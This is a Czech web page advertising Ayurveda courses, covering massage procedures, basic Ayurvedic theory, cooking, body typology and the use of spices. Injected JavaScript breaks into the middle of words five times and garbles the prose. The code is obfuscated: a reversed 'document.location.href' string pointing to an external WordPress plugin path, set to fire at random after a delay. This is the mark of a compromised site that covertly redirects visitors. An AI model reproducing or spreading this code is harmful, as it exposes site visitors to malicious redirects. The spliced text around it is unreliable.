Kurzy
Výuka ájurvedských masáží a procedur:
- Antistresová masáž obličeje a hlavy
- Sarvang masáž
- Dátá Snéhan masáž
- Basti procedura
- Procedura kovovými miskami
- Nadí svédan procedura
- Pinda svédan procedura
Výuka základů ájurvédy:
- Principy ájurvédy
- Pančmahabhůt
- Tridóš
- Triguny
Výuka ájurvédské kuchyně:
Typologie člověka
Tělo potřebuje výživu, která se vytváří z jídla. Protoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to by jídlo mělo obsahovat výživné látky pro všech sedm druhů tkání. Pokud se díváme jen povrchově, má každý člověk skoro stejné tělo. Budeme-li pozorovat detaily, rozeznáme odlišnosti a pochopíme, že pro někoho může být podaná potravina lék a pro jiného jed. V ájurvédě se těla poznávají podle stavu pančmahabhůt. Povaha a trvalá vlastnost člověka záleží na dominantní mahabhůt v těle.
Základní znalosti o koření
Koření je obecně používáno hlavně pro zvláštní chuť a aroma, které dodává jídlu, s nimž je kombinováno. Usnadňuje trávení a působí antisepticky proti nežádoucí mikroflóře. Koření působí jako lék, a protoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to se musí používat nejen podle chuti, ale i podle jeho vlastností a potřeby těla. Například chilli není třeba používat v chladném pásmu, protoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tože probouzí pocit žízně. V mírném pásmu, pokud je několik dní horko, je chilli užitečné, jelikož vzbudí chuť na čistoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tou vodu. Extrémní používání zázvoru v teplém období může u člověka zvýšit pitt, což bude příčinou krvácení z nosu. V zimním období udržuje oheň v těle a celkově pomáhá pří zvýšené kaf. Podobně by se daly rozebrat další druhy koření. Tatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to snadná logika je dostačující, aby si člověk mohl vybrat ve správný okamžik správné koření.
Ukázka základních ajurvédských pokrmů
Sabdží, rajta, čapátí, purí, čonk- klíčový recept v indické kuchyni.